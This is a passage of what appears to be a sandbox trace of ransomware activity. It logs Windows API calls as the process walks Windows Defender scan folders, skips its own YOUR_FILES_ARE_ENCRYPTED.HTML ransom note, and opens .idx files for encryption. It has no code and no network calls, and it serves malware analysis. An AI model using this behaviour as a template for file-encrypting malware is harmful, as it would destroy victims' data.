returned 1 [0110.358] StrStrIW (lpFirst="Unknown.Log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.358] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log") returned 83 [0110.358] PathFindExtensionW (pszPath="Unknown.Log") returned=".Log" [0110.358] lstrlenW (lpString=".Log") returned 4 [0110.358] PathFindExtensionW (pszPath="Unknown.Log") returned=".Log" [0110.358] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf453171, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf453171, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf456c5d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.358] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf453171, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf453171, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf456c5d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.358] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0110.358] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0110.358] GetProcessHeap () returned 0x600000 [0110.358] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.358] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\service\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.359] GetProcessHeap () returned 0x600000 [0110.359] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.359] GetProcessHeap () returned 0x600000 [0110.359] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.359] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf141f151, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName="Store", cAlternateFileName="")) returned 1 [0110.359] StrStrIW (lpFirst="Store", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.359] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store") returned 69 [0110.359] GetProcessHeap () returned 0x600000 [0110.359] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.360] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store" [0110.360] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*" [0110.360] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf45f594, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.360] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf45f594, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0110.361] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf45f594, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf45f594, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf465659, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.361] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf45f594, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf45f594, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf465659, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.361] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.361] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 99 [0110.361] GetProcessHeap () returned 0x600000 [0110.361] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\store\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.361] GetProcessHeap () returned 0x600000 [0110.361] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.361] GetProcessHeap () returned 0x600000 [0110.361] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.362] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf46910b, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf46910b, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf46f2e8, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.362] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf46910b, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf46910b, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf46f2e8, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.362] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.362] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0110.362] GetProcessHeap () returned 0x600000 [0110.362] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.362] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.363] GetProcessHeap () returned 0x600000 [0110.363] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.363] GetProcessHeap () returned 0x600000 [0110.363] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.364] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="MetaStore", cAlternateFileName="METAST~1")) returned 1 [0110.364] StrStrIW (lpFirst="MetaStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.364] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore") returned 65 [0110.364] GetProcessHeap () returned 0x600000 [0110.364] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.365] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore" [0110.365] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\*" [0110.365] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf4c35ed, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName=".", cAlternateFileName="")) returned 0x626738 [0110.365] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf4c35ed, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName="..", cAlternateFileName="")) returned 1 [0110.367] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName="1", cAlternateFileName="")) returned 1 [0110.367] StrStrIW (lpFirst="1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.367] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\1") returned 67 [0110.367] GetProcessHeap () returned 0x600000 [0110.367] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.367] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\1" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\1") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\1" [0110.367] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\1", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\1\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\1\\*" [0110.367] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\1\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf47c958, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0110.368] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf47c958, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0110.368] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a50b7ab, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6520aed4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName="0000000000000000.idx", cAlternateFileName="000000~1.IDX")) returned 1 [0110.368] StrStrIW (lpFirst="0000000000000000.idx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.368] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\1\\0000000000000000.idx") returned 88 [0110.368] PathFindExtensionW (pszPath="0000000000000000.idx") returned=".idx" [0110.368] lstrlenW (lpString=".idx") returned 4 [0110.368] PathFindExtensionW (pszPath="0000000000000000.idx") returned=".idx" [0110.368] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0110.368] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\1\\0000000000000000.idx" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\metastore\\1\\0000000000000000.idx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0110.368] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=80) returned 1 [0110.368] CloseHandle (hObject=0x310) returned 1 [0110.368] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf47b7c4, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf47b7c4, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf4803de, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.368] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf47b7c4, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf47b7c4, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf4803de, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.368] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0110.369] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\1\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0110.369] GetProcessHeap () returned 0x600000 [0110.369] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\1\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\metastore\\1\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.369] GetProcessHeap () returned 0x600000 [0110.369] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.369] GetProcessHeap () returned 0x600000 [0110.369] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.370] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName="2", cAlternateFileName="")) returned 1 [0110.370] StrStrIW (lpFirst="2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.370] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\2") returned 67 [0110.370] GetProcessHeap () returned 0x600000 [0110.370] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.370] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\2" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\2") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\2" [0110.370] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\2", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\2\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\2\\*" [0110.371] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\2\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf48b46c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0110.371] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf48b46c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0110.371] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a50b7ab, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6520aed4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName="0000000000000000.idx", cAlternateFileName="000000~1.IDX")) returned 1 [0110.371] StrStrIW (lpFirst="0000000000000000.idx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.371] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\2\\0000000000000000.idx") returned 88 [0110.371] PathFindExtensionW (pszPath="0000000000000000.idx") returned=".idx" [0110.371] lstrlenW (lpString=".idx") returned 4 [0110.371] PathFindExtensionW (pszPath="0000000000000000.idx") returned=".idx" [0110.371] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0110.371] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MetaStore\\2\\0000000000000000.idx" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\metastore\\2\\0000000000000000.idx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0110.371] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=80) returned 1 [0110.371] CloseHandle (hObject=0x310) returned 1 [0110.372] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf48b46c, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf48b46c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf4904cc, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.372] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf48b46c, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf48b46c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf4904cc, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6401ac, dwReserved1=0x640128, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.372] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0110.372] 